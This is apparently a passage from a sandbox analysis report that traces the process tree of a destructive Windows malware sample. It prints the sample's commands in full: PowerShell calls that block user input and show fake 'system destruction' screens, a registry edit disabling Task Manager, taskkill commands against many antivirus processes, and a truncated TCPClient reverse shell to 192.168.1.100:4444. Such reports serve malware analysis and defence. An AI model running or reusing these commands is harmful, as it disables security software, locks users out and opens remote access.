        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        23⤵
        
        PID:2232
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qz34btvd\qz34btvd.cmdline"
        24⤵
        
        PID:5404
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEAFC.tmp" "c:\Users\Admin\AppData\Local\Temp\qz34btvd\CSCA357458FF45547A39F805B5129BBF718.TMP"
        25⤵
        
        PID:5328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        23⤵
        
        PID:2232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        23⤵
        
        PID:1756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        23⤵
        Kills process with taskkill
        
        PID:8268
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        23⤵
        
        PID:8744
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        23⤵
        Kills process with taskkill
        
        PID:7828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        23⤵
        
        PID:8596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        23⤵
        Kills process with taskkill
        
        PID:8364
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        23⤵
        
        PID:5564
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        23⤵
        Kills process with taskkill
        
        PID:6608
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        23⤵
        
        PID:8752
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        23⤵
        
        PID:1432
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        23⤵
        Kills process with taskkill
        
        PID:5868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        21⤵
        
        PID:1740
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qqxjrexu\qqxjrexu.cmdline"
        22⤵
        
        PID:3216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        21⤵
        
        PID:5416
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hrv40nsh\hrv40nsh.cmdline"
        22⤵
        
        PID:4400
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDEE6.tmp" "c:\Users\Admin\AppData\Local\Temp\hrv40nsh\CSC326A46AEBA4B4CEF84DD2A67552318DB.TMP"
        23⤵
        
        PID:5964
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        21⤵
        
        PID:5164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        21⤵
        
        PID:3944
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\obsvcpau\obsvcpau.cmdline"
        22⤵
        
        PID:5692
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE37A.tmp" "c:\Users\Admin\AppData\Local\Temp\obsvcpau\CSCBEB18D5FB2C74F379EC1DDBC79ABFEF6.TMP"
        23⤵
        
        PID:6032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        21⤵
        
        PID:5416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        21⤵
        
        PID:2652
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        21⤵
        
        PID:7784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        21⤵
        
        PID:8384
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        21⤵
        
        PID:8504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        21⤵
        
        PID:7596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        21⤵
        Kills process with taskkill
        
        PID:6604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        21⤵
        Kills process with taskkill
        
        PID:8612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        21⤵
        Kills process with taskkill
        
        PID:7200
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        21⤵
        
        PID:5624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        21⤵
        
        PID:4776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        21⤵
        
        PID:5036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        21⤵
        Kills process with taskkill
        
        PID:5124
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        21⤵
        Kills process with taskkill
        
        PID:5644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        21⤵
        
        PID:3536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        19⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:344
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\umrfzyaj\umrfzyaj.cmdline"
        20⤵
        
        PID:2320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        19⤵
        
        PID:5320
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tfasdpen\tfasdpen.cmdline"
        20⤵
        
        PID:6132
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB5C.tmp" "c:\Users\Admin\AppData\Local\Temp\tfasdpen\CSC16A1B6672D9848C3BDB3113A1279AC9F.TMP"
        21⤵
        
        PID:6060
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        19⤵
        
        PID:5308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        19⤵
        
        PID:5888
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4gytydq0\4gytydq0.cmdline"
        20⤵
        
        PID:4452
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF92.tmp" "c:\Users\Admin\AppData\Local\Temp\4gytydq0\CSCE8961201ADD74FBB8CF173FB38B20DB.TMP"
        21⤵
        
        PID:5928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        19⤵
        
        PID:5416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        19⤵
        
        PID:7344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        19⤵
        Kills process with taskkill
        
        PID:9036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        19⤵
        Kills process with taskkill
        
        PID:2004
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        19⤵
        
        PID:4108
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        19⤵
        
        PID:6944
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        19⤵
        
        PID:8392
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        19⤵
        Kills process with taskkill
        
        PID:6428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        19⤵
        Kills process with taskkill
        
        PID:5064
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        19⤵
        
        PID:6552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        19⤵
        
        PID:2284
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        19⤵
        
        PID:7544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        19⤵
        
        PID:7928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        19⤵
        Kills process with taskkill
        
        PID:5308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        19⤵
        
        PID:8880
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jbql1ncc\jbql1ncc.cmdline"
        20⤵
        
        PID:6620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        17⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccjbr3bq\ccjbr3bq.cmdline"
        18⤵
        
        PID:4108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        17⤵
        
        PID:3368
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h0z2qnsb\h0z2qnsb.cmdline"
        18⤵
        
        PID:3964
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDCE3.tmp" "c:\Users\Admin\AppData\Local\Temp\h0z2qnsb\CSC558BA65E1C964AABB4785207422A091.TMP"
        19⤵
        
        PID:3688
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        17⤵
        
        PID:1932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        17⤵
        
        PID:5316
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x5lzg20e\x5lzg20e.cmdline"
        18⤵
        
        PID:5296
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE148.tmp" "c:\Users\Admin\AppData\Local\Temp\x5lzg20e\CSCE7571AC71E1E4C01AD7DB29A7D3B293.TMP"
        19⤵
        
        PID:5444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        17⤵
        
        PID:1756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        17⤵
        
        PID:5516
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        17⤵
        Kills process with taskkill
        
        PID:6932
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        17⤵
        
        PID:1748
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        17⤵
        Kills process with taskkill
        
        PID:6484
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        17⤵
        Kills process with taskkill
        
        PID:5564
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        17⤵
        
        PID:8080
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        17⤵
        
        PID:8908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        17⤵
        
        PID:7928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        17⤵
        Kills process with taskkill
        
        PID:6640
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        17⤵
        
        PID:5624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        17⤵
        Kills process with taskkill
        
        PID:7444
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        17⤵
        
        PID:7736
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        17⤵
        Kills process with taskkill
        
        PID:8404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        17⤵
        
        PID:3988
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xscbzcx2\xscbzcx2.cmdline"
        18⤵
        
        PID:8336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        15⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4560
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m105yl1s\m105yl1s.cmdline"
        16⤵
        
        PID:1732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        15⤵
        
        PID:5808
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ymudiabu\ymudiabu.cmdline"
        16⤵
        
        PID:1848
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD215.tmp" "c:\Users\Admin\AppData\Local\Temp\ymudiabu\CSC437862515D88407A8C894DAB47E0F33D.TMP"
        17⤵
        
        PID:4040
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        15⤵
        
        PID:3352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        15⤵
        
        PID:5528
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ps3dv1b0\ps3dv1b0.cmdline"
        16⤵
        
        PID:588
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD60D.tmp" "c:\Users\Admin\AppData\Local\Temp\ps3dv1b0\CSC1748C4AA68334568BD549AE6CF8D398E.TMP"
        17⤵
        
        PID:1860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        15⤵
        
        PID:6064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        15⤵
        
        PID:6004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        15⤵
        
        PID:7204
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        15⤵
        
        PID:6560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        15⤵
        
        PID:3640
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        15⤵
        Kills process with taskkill
        
        PID:5820
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        15⤵
        Kills process with taskkill
        
        PID:4444
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        15⤵
        
        PID:5428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        15⤵
        Kills process with taskkill
        
        PID:7564
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        15⤵
        Kills process with taskkill
        
        PID:8520
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        15⤵
        Kills process with taskkill
        
        PID:8864
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        15⤵
        Kills process with taskkill
        
        PID:8208
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        15⤵
        
        PID:2836
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        15⤵
        
        PID:8980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        15⤵
        
        PID:7792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        15⤵
        
        PID:5924
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l3cc0u5b\l3cc0u5b.cmdline"
        16⤵
        
        PID:2004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        13⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4040
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lmuznebl\lmuznebl.cmdline"
        14⤵
        
        PID:5012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        13⤵
        
        PID:1584
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
